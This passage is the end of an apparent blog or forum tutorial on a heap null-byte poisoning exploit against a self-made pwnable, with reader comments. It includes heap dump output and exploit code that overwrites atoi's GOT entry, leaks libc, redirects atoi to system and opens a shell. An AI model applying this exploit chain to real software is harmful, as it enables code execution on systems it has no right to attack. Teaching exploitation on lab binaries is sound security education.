# Further allocations will split that chunk as long as the request size is <= 0x321.
alloc(0x140, 'Z'*0x110 + p64(8) + p64(atoi_got))

0x6031e0:	0x4242424242424242	0x0000000000000151 <-- new chunk overlaps with chunk w
0x6031f0:	0x5a5a5a5a5a5a5a5a	0x5a5a5a5a5a5a5a5a
0x603200:	0x5a5a5a5a5a5a5a5a	0x5a5a5a5a5a5a5a5a
0x603210:	0x5a5a5a5a5a5a5a5a	0x5a5a5a5a5a5a5a5a
					...					...
0x6032f0:	0x5a5a5a5a5a5a5a5a	0x5a5a5a5a5a5a5a5a <-- chunk w is overwritten
0x603300:	0x0000000000000008	0x0000000000602058 <-- atoi's GOT entry
	

### Conclusion

The rest is history; I’ll let you figure out what’s next, it’s a piece of cake at this point. That’s been it, folks. If you’ve made it to this sentence you’re a true champ, and I’d like to thank you for taking the time to read my post. I hope you learnt something new, and if you have any questions feel free to ask them down below or hit me up on IRC/Twitter.
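
If you want to check your answer against mine afterwards, the finishing moves look roughly like this. A sketch only: the chunk index, the dump parsing, and the libc path are assumptions based on the walkthrough above:

# chunk w's metadata now reads: size = 8, data = atoi@GOT.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')  # Ubuntu 16.04 path (assumption)

# Dumping chunk w (index 5, going by allocation order) leaks
# atoi's libc address through the overwritten data pointer.
atoi_leak = u64(dump(5)[:6].ljust(8, b'\x00'))
libc_base = atoi_leak - libc.symbols['atoi']

# Editing chunk w now writes straight over atoi's GOT entry.
edit(5, p64(libc_base + libc.symbols['system']))

# Every menu choice is parsed with atoi(), which is now system().
p.sendline('/bin/sh')
p.interactive()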


### References

(1) how2heap
(2) HITCON Lab

~ Peace out


Thank you for a great tutorial :slight_smile:
I didn’t know much about the heap null-poison attack. Thanks to you, I feel like I’m getting to know it :blush:
Thank you again, _py~


How much time did it take you to put this information together? You’re awesome, bro. I can’t understand a thing since I’m a beginner, but what you did looks super cool.


Thank you for the feedback!

That depends entirely on how “heavy” the topic I’m trying to share is. This particular concept, for instance, is by far the most technical write-up I’ve written so far. I’d say it took me about 2-3 weeks of continuous research/reading, and then about 4-5 days to create a pwnable, write a PoC, and simplify the technique to make it a bit easier to digest.
